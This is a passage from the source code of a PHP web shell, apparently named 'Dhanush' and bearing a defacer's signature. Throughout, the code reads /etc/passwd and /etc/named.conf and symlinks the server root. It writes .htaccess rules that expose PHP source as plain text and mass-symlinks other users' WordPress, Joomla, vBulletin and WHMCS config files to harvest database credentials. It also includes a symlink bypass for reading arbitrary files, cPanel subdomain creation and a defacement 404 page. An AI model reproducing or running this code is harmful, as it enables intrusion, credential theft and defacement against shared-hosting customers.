2046 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2047
2048 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2049 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
2050 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2051 </tr>
2052 <p>
2053 <?php
2054 }
2055 }
2056
2057 echo "</table>
2058<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
2059<select class=sbox name=choice style='width: 100px;'>
2060 <option value=delete>Delete</option>
2061 <option value=chmod>Change mode</option>
2062 if(class_exists('ZipArchive'))
2063 { <option value=compre>Compress</option>
2064 <option value=uncompre>Uncompress</option> }
2065 </select>
2066
2067 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
2068 }}
2069 else
2070 {
2071 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
2072 }
2073
2074}
2075if(isset($_REQUEST["script"]))
2076{
2077 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
2078 ?>
2079 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('scserver')"><font class=txt size="4">| Use Server |</font></a></td>
2080 <td><a href=javascript:void(0) onClick="getdata('scphp')"><font class=txt size="4">| Use PHP |</font></a></td>
2081 </tr></table></center>
2082 <?php
2083}
2084elseif(isset($_REQUEST["scserver"]))
2085{
2086 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('servermanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2087 <td><a href=javascript:void(0) onClick="getdata('serverscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2088 </tr></table></center><?php
2089}
2090else if(isset($_REQUEST['servermanuallyscript']))
2091{
2092 ?>
2093 <center>
2094 <form action="<?php echo $self; ?>" method="post">
2095 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2096 <input type="button" OnClick="manuallyscriptfn('serverscriptlocator',passwd.value)" value="Get Config" class="but">
2097 </form>
2098 </center>
2099 <?php
2100}
2101elseif(isset($_REQUEST['serverscriptlocator']))
2102{
2103 if($os != "Windows")
2104 {
2105 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2106 $path=explode('/',$url);
2107 $url =str_replace($path[count($path)-1],'',$url);
2108 if(isset($_REQUEST['passwd']))
2109 {
2110 $getetc = trim($_REQUEST['passwd']);
2111
2112 mkdir("dhanushSPT");
2113 chdir("dhanushSPT");
2114
2115 $myfile = fopen("test.txt","w");
2116
2117 fputs($myfile,$getetc);
2118 fclose($myfile);
2119 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Username</font></td><td align=center><font size=4 >Script</font></td></tr>";
2120 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2121 while(!feof($file))
2122 {
2123 $s = fgets($file);
2124 $matches = array();
2125 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2126 $matches = str_replace("home/","",$matches[1]);
2127 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2128 $headers=get_headers($hs_status);
2129 if(strpos($headers[0],'200') == true )
2130 $hs_script = "Wordpress";
2131 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2132 $headers=get_headers($hs_status);
2133 if(strpos($headers[0],'200') == true )
2134 $hs_script = "Wordpress";
2135 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2136 $headers=get_headers($hs_status);
2137 if(strpos($headers[0],'200') == true )
2138 $hs_script = "Joomla";
2139 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2140 $headers=get_headers($hs_status);
2141 if(strpos($headers[0],'200') == true )
2142 $hs_script = "Vbulletin";
2143 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2144 $headers=get_headers($hs_status);
2145 if(strpos($headers[0],'200') == true )
2146 $hs_script = "Vbulletin";
2147 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2148 $headers=get_headers($hs_status);
2149 if(strpos($headers[0],'200') == true )
2150 $hs_script = "Mybb";
2151 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2152 $headers=get_headers($hs_status);
2153 if(strpos($headers[0],'200') == true )
2154 $hs_script = "IPB";
2155 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2156 $headers=get_headers($hs_status);
2157 if(strpos($headers[0],'200') == true )
2158 $hs_script = "SMF";
2159 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2160 $headers=get_headers($hs_status);
2161 if(strpos($headers[0],'200') == true )
2162 $hs_script = "WHMCS";
2163 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2164 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2165 $dcount++;
2166 }
2167 echo "</table>";
2168 fclose($file);
2169 unlink("test.txt");
2170 }
2171 else
2172 {
2173 $d0mains = @file("/etc/named.conf");
2174 if($d0mains)
2175 {
2176 @mkdir("dhanush",0777);
2177 @chdir("dhanush");
2178 execmd("ln -s / root");
2179 $file3 = 'Options all
2180 DirectoryIndex Sux.html
2181 AddType text/plain .php
2182 AddHandler server-parsed .php
2183 AddType text/plain .html
2184 AddHandler txt .html
2185 Require None
2186 Satisfy Any
2187 ';
2188 $fp3 = fopen('.htaccess','w');
2189 $fw3 = fwrite($fp3,$file3);
2190 @fclose($fp3);
2191 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Site</font></td><td align=center><font size=4 >Script</font></td></tr>";
2192 $dcount = 1;
2193 foreach($d0mains as $d0main)
2194 {
2195 if(eregi("zone",$d0main))
2196 {
2197 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2198 flush();
2199
2200 if(strlen(trim($domains[1][0])) > 2)
2201 {
2202 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2203 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/wp-config.php";
2204 $headers=get_headers($hs_status);
2205 if(strpos($headers[0],'200') == true )
2206 $hs_script = "Wordpress";
2207 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/blog/wp-config.php";
2208 $headers=get_headers($hs_status);
2209 if(strpos($headers[0],'200') == true )
2210 $hs_script = "Wordpress";
2211 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/configuration.php";
2212 $headers=get_headers($hs_status);
2213 if(strpos($headers[0],'200') == true )
2214 $hs_script = "Joomla";
2215 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/forum/includes/config.php";
2216 $headers=get_headers($hs_status);
2217 if(strpos($headers[0],'200') == true )
2218 $hs_script = "Vbulletin";
2219 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/core/includes/config.php";
2220 $headers=get_headers($hs_status);
2221 if(strpos($headers[0],'200') == true )
2222 $hs_script = "Vbulletin";
2223 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/inc/config.php";
2224 $headers=get_headers($hs_status);
2225 if(strpos($headers[0],'200') == true )
2226 $hs_script = "Mybb";
2227 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/conf_global.php";
2228 $headers=get_headers($hs_status);
2229 if(strpos($headers[0],'200') == true )
2230 $hs_script = "IPB";
2231 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/settings.php";
2232 $headers=get_headers($hs_status);
2233 if(strpos($headers[0],'200') == true )
2234 $hs_script = "SMF";
2235 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/submitticket.php";
2236 $headers=get_headers($hs_status);
2237 if(strpos($headers[0],'200') == true )
2238 $hs_script = "WHMCS";
2239 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td><a href=".$domains[1][0]." target='_blank'><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt><a href=".$hs_status." target=_blank>".$hs_user."</a></font></td></tr>"; flush();
2240
2241 $dcount++;
2242 }
2243 }
2244
2245 }
2246 echo "</table>";
2247 }
2248 else
2249 {
2250 $TEST=@file('/etc/passwd');
2251 if ($TEST)
2252 {
2253 @mkdir("dhanush",0777);
2254 @chdir("dhanush");
2255 execmd("ln -s / root");
2256 $file3 = 'Options all
2257 DirectoryIndex Sux.html
2258 AddType text/plain .php
2259 AddHandler server-parsed .php
2260 AddType text/plain .html
2261 AddHandler txt .html
2262 Require None
2263 Satisfy Any
2264 ';
2265 $fp3 = fopen('.htaccess','w');
2266 $fw3 = fwrite($fp3,$file3);
2267 @fclose($fp3);
2268
2269 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2270
2271 $dcount = 1;
2272 $file = fopen("/etc/passwd", "r");
2273 //Output a line of the file until the end is reached
2274 while(!feof($file))
2275 {
2276 $s = fgets($file);
2277 $matches = array();
2278 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2279 $matches = str_replace("home/","",$matches[1]);
2280 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2281 $headers=get_headers($hs_status);
2282 if(strpos($headers[0],'200') == true )
2283 $hs_script = "Wordpress";
2284 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2285 $headers=get_headers($hs_status);
2286 if(strpos($headers[0],'200') == true )
2287 $hs_script = "Wordpress";
2288 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2289 $headers=get_headers($hs_status);
2290 if(strpos($headers[0],'200') == true )
2291 $hs_script = "Joomla";
2292 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2293 $headers=get_headers($hs_status);
2294 if(strpos($headers[0],'200') == true )
2295 $hs_script = "Vbulletin";
2296 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2297 $headers=get_headers($hs_status);
2298 if(strpos($headers[0],'200') == true )
2299 $hs_script = "Vbulletin";
2300 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2301 $headers=get_headers($hs_status);
2302 if(strpos($headers[0],'200') == true )
2303 $hs_script = "Mybb";
2304 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2305 $headers=get_headers($hs_status);
2306 if(strpos($headers[0],'200') == true )
2307 $hs_script = "IPB";
2308 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2309 $headers=get_headers($hs_status);
2310 if(strpos($headers[0],'200') == true )
2311 $hs_script = "SMF";
2312 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2313 $headers=get_headers($hs_status);
2314 if(strpos($headers[0],'200') == true )
2315 $hs_script = "WHMCS";
2316 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2317 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2318 $dcount++;
2319 }
2320 fclose($file);
2321
2322 echo "</table>";
2323 }
2324 else
2325 {
2326 @mkdir("dhanush",0777);
2327 @chdir("dhanush");
2328 execmd("ln -s / root");
2329 $file3 = 'Options all
2330 DirectoryIndex Sux.html
2331 AddType text/plain .php
2332 AddHandler server-parsed .php
2333 AddType text/plain .html
2334 AddHandler txt .html
2335 Require None
2336 Satisfy Any
2337 ';
2338 $fp3 = fopen('.htaccess','w');
2339 $fw3 = fwrite($fp3,$file3);
2340 @fclose($fp3);
2341 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2342 $temp = "";
2343 $val1 = 0;
2344 $val2 = 1000;
2345 for(;$val1 <= $val2;$val1++)
2346 {
2347 $uid = @posix_getpwuid($val1);
2348 if ($uid)
2349 $temp .= join(':',$uid)."\n";
2350 }
2351 echo '<br/>';
2352 $temp = trim($temp);
2353
2354 $file5 = fopen("test.txt","w");
2355 fputs($file5,$temp);
2356 fclose($file5);
2357
2358 $dcount = 1;
2359 $file = fopen("test.txt", "r");
2360 while(!feof($file))
2361 {
2362 $s = fgets($file);
2363 $matches = array();
2364 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2365 $matches = str_replace("home/","",$matches[1]);
2366 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2367 $headers=get_headers($hs_status);
2368 if(strpos($headers[0],'200') == true )
2369 $hs_script = "Wordpress";
2370 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2371 $headers=get_headers($hs_status);
2372 if(strpos($headers[0],'200') == true )
2373 $hs_script = "Wordpress";
2374 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2375 $headers=get_headers($hs_status);
2376 if(strpos($headers[0],'200') == true )
2377 $hs_script = "Joomla";
2378 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2379 $headers=get_headers($hs_status);
2380 if(strpos($headers[0],'200') == true )
2381 $hs_script = "Vbulletin";
2382 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2383 $headers=get_headers($hs_status);
2384 if(strpos($headers[0],'200') == true )
2385 $hs_script = "Vbulletin";
2386 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2387 $headers=get_headers($hs_status);
2388 if(strpos($headers[0],'200') == true )
2389 $hs_script = "Mybb";
2390 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2391 $headers=get_headers($hs_status);
2392 if(strpos($headers[0],'200') == true )
2393 $hs_script = "IPB";
2394 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2395 $headers=get_headers($hs_status);
2396 if(strpos($headers[0],'200') == true )
2397 $hs_script = "SMF";
2398 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2399 $headers=get_headers($hs_status);
2400 if(strpos($headers[0],'200') == true )
2401 $hs_script = "WHMCS";
2402 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2403 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2404 $dcount++;
2405 }
2406 fclose($file);
2407 echo "</table>";
2408 unlink("test.txt");
2409 }
2410 }
2411 }
2412 }
2413 else
2414 echo "<center>Cannot Get Scripts</center>";
2415}
2416elseif(isset($_REQUEST["scphp"]))
2417{
2418 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('phpmanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2419 <td><a href=javascript:void(0) onClick="getdata('phpscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2420 </tr></table></center><?php
2421}
2422else if(isset($_REQUEST['phpmanuallyscript']))
2423{
2424 ?>
2425 <center>
2426 <form action="<?php echo $self; ?>" method="post">
2427 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2428 <input type="button" OnClick="manuallyscriptfn('phpscriptlocator',passwd.value)" value="Get Config" class="but">
2429 </form>
2430 </center>
2431 <?php
2432}
2433else if(isset($_REQUEST['phpscriptlocator']))
2434{
2435 if($os == "Linux")
2436 {
2437 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2438 $path=explode('/',$url);
2439 $url =str_replace($path[count($path)-1],'',$url);
2440 function syml($usern,$pdomain)
2441 {
2442 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2443 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2444 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2445 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2446 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2447 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
2448 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2449 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2450 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
2451 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2452 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2453 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2454 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2455 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2456 symlink('/home/'.$usern.'/public_html/bb-config.php',$pdomain.'~~boxbilling.txt');
2457 symlink('/home/'.$usern.'/public_html/billing/bb-config.php',$pdomain.'~~boxbilling.txt');
2458 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2459 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2460 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2461 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2462 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2463 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2464 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2465 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2466 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2467 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
2468 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
2469 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2470 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
2471 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
2472 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2473 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
2474 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2475 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2476 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2477 }
2478 if(isset($_REQUEST['passwd']))
2479 {
2480 $getetc = trim($_REQUEST['passwd']);
2481
2482 mkdir("dhanushSPT");
2483 chdir("dhanushSPT");
2484 $file3 = 'Options all
2485 DirectoryIndex Sux.html
2486 AddType text/plain .php
2487 AddHandler server-parsed .php
2488 AddType text/plain .html
2489 AddHandler txt .html
2490 Require None
2491 Satisfy Any
2492 ';
2493 $fp3 = fopen('.htaccess','w');
2494 $fw3 = fwrite($fp3,$file3);
2495 @fclose($fp3);
2496 $myfile = fopen("test.txt","w");
2497 fputs($myfile,$getetc);
2498 fclose($myfile);
2499
2500 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2501 while(!feof($file))
2502 {
2503 $s = fgets($file);
2504 $matches = array();
2505 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2506 $matches = str_replace("home/","",$matches[1]);
2507 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2508 continue;
2509 syml($matches,$matches);
2510 }
2511 fclose($file);
2512 unlink("test.txt");
2513 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2514 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2515
2516 }
2517 else
2518 {
2519 $d0mains = @file("/etc/named.conf");
2520 if($d0mains)
2521 {
2522 mkdir("dhanushST");
2523 chdir("dhanushST");
2524 $file3 = 'Options all
2525 DirectoryIndex Sux.html
2526 AddType text/plain .php
2527 AddHandler server-parsed .php
2528 AddType text/plain .html
2529 AddHandler txt .html
2530 Require None
2531 Satisfy Any
2532 ';
2533 $fp3 = fopen('.htaccess','w');
2534 $fw3 = fwrite($fp3,$file3);
2535 @fclose($fp3);
2536 foreach($d0mains as $d0main)
2537 {
2538 if(eregi("zone",$d0main))
2539 {
2540 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2541 flush();
2542
2543 if(strlen(trim($domains[1][0])) > 2)
2544 {
2545 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2546
2547 syml($user['name'],$domains[1][0]);
2548 }
2549 }
2550 }
2551 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2552 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2553 }
2554 else
2555 {
2556 mkdir("dhanushSPT");
2557 chdir("dhanushSPT");
2558 $file3 = 'Options all
2559 DirectoryIndex Sux.html
2560 AddType text/plain .php
2561 AddHandler server-parsed .php
2562 AddType text/plain .html
2563 AddHandler txt .html
2564 Require None
2565 Satisfy Any
2566 ';
2567 $fp3 = fopen('.htaccess','w');
2568 $fw3 = fwrite($fp3,$file3);
2569 @fclose($fp3);
2570 $temp = "";
2571 $val1 = 0;
2572 $val2 = 1000;
2573 for(;$val1 <= $val2;$val1++)
2574 {
2575 $uid = @posix_getpwuid($val1);
2576 if ($uid)
2577 $temp .= join(':',$uid)."\n";
2578 }
2579 echo '<br/>';
2580 $temp = trim($temp);
2581
2582 $file5 = fopen("test.txt","w");
2583 fputs($file5,$temp);
2584 fclose($file5);
2585
2586
2587 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2588 while(!feof($file))
2589 {
2590 $s = fgets($file);
2591 $matches = array();
2592 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2593 $matches = str_replace("home/","",$matches[1]);
2594 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2595 continue;
2596 syml($matches,$matches);
2597 }
2598 fclose($file);
2599 echo "</table>";
2600 unlink("test.txt");
2601 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2602 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2603 }
2604 }
2605 }
2606 else
2607 echo "<center>Cannot Complete the task!!!!</center>";
2608
2609}
2610else if(isset($_GET["symlinkfile"]))
2611{
2612 if(!isset($_GET['file']))
2613 {
2614 ?>
2615 <center>
2616 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
2617 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
2618 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
2619 </form></center>
2620 <br><br>
2621 <?php
2622 }
2623}
2624else if(isset($_GET['symlinkmyfile']))
2625{
2626 if($os == "Linux")
2627 {
2628 $fakedir="cx";
2629 $fakedep=16;
2630
2631 $num=0; // offset of symlink.$num
2632
2633 if(!empty($_GET['myfile']))
2634 $file=$_GET['myfile'];
2635 else $file="";
2636
2637 if(empty($file))
2638 exit;
2639
2640 if(!is_writable("."))
2641 echo "not writable directory";
2642
2643 $level=0;
2644
2645 for($as=0;$as<$fakedep;$as++)
2646 {
2647 if(!file_exists($fakedir))
2648 mkdir($fakedir);
2649 chdir($fakedir);
2650 }
2651
2652 while(1<$as--) chdir("..");
2653
2654 $hardstyle = explode("/", $file);
2655
2656 for($a=0;$a<count($hardstyle);$a++)
2657 {
2658 if(!empty($hardstyle[$a]))
2659 {
2660 if(!file_exists($hardstyle[$a]))
2661 mkdir($hardstyle[$a]);
2662 chdir($hardstyle[$a]);
2663 $as++;
2664 }
2665 }
2666 $as++;
2667 while($as--)
2668 chdir("..");
2669
2670 @rmdir("fakesymlink");
2671 @unlink("fakesymlink");
2672
2673 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
2674
2675 while(1)
2676 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
2677 else $num++;
2678
2679 @unlink("fakesymlink");
2680 mkdir("fakesymlink");
2681
2682 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
2683 }
2684 else
2685 echo '<CENTER>Cannot Create Symlink</CENTER>';
2686}
2687else if(isset($_POST['cpaneluser']))
2688{
2689 if(is_numeric($_POST['noofsubdomain']))
2690 {
2691 for($i=1;$i<=$_POST['noofsubdomain'];$i++)
2692 {
2693 $subDomain = randomt();
2694 echo make_subdomain($subDomain,$_POST['cpaneluser'],$_POST['cpanelpass'],$_POST['subindex']);
2695 }
2696 }
2697 else
2698 echo "Insert number";
2699}
2700else if(isset($_REQUEST['404new']))
2701{
2702 ?>
2703 <form>
2704 <center><textarea name=message cols=100 rows=18 class=box>lol! TH3-D357ROY3R WAS HERE !!!!!</textarea></br>
2705 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
2706 </br>
2707 </form>
2708 <?php
2709}
2710else if(isset($_REQUEST['404page']))
2711{
2712 $url = $_SERVER['REQUEST_URI'];
2713 $path=explode('/',$url);
2714 $url =str_replace($path[count($path)-1],'',$url);
2715 if(isset($_POST['message']))
2716 {
2717 if($myfile = fopen(".htaccess", "a"))
2718 {
2719 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2720 if($myfilee = fopen("404.html", "w+"))
2721 {
2722 fwrite($myfilee, $_POST['message']);
2723 }
2724 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2725 }
2726 else
2727 echo "<center>Cannot Set 404 Page</center>";
2728 }
2729 else if(strlen($ind) != 0)
2730 {
2731 if($myfile = fopen(".htaccess", "a"))
2732 {
2733 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2734
2735 if($myfilee = fopen("404.html", "w+"))
2736 {
2737 fwrite($myfilee, base64_decode($ind));
2738
2739 fclose($myfilee);
2740 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2741 }
2742 fclose($myfile);
2743 }
2744 else
2745 {
2746 echo "<center>Cannot Set 404 Page</center>";
2747 }
2748 }
2749 else
2750 echo "<center>Nothing Specified in the shell</center>";
2751}
2752else if(isset($_GET["symlink"]))
2753{
2754 $d0mains = @file("/etc/named.conf");
2755 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2756 $path=explode('/',$url);
2757 $url =str_replace($path[count($path)-1],'',$url);
2758 if($d0mains)
2759 {
2760 @mkdir("dhanush",0777);
2761 @chdir("dhanush");
2762 execmd("ln -s / root");
2763
2764 $file3 = 'Options all
2765 DirectoryIndex Sux.html
2766 AddType text/plain .php
2767 AddHandler server-parsed .php
2768 AddType text/plain .html
2769 AddHandler txt .html
2770 Require None
2771 Satisfy Any
2772 ';
2773 $fp3 = fopen('.htaccess','w');
2774 $fw3 = fwrite($fp3,$file3);
2775 @fclose($fp3);
2776
2777 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
2778
2779 $dcount = 1;
2780 foreach($d0mains as $d0main)
2781 {
2782 if(eregi("zone",$d0main))
2783 {
2784 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2785 flush();
2786
2787 if(strlen(trim($domains[1][0])) > 2)
2788 {
2789 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2790
2791 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
2792 $dcount++;
2793 }
2794 }
2795
2796 }
2797 echo "</table>";
2798 }
2799 else
2800 {
2801 if($os == "Linux")
2802 {
2803 ?>
2804 <div style="float:left;position:fixed;">
2805 <form>
2806 <table cellpadding="9">
2807 <tr>
2808 <th colspan="2">Get User Name</th>
2809 </tr>
2810 <tr>
2811 <td>Enter Website Name :</td>
2812 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
2813 </tr>
2814 <tr>
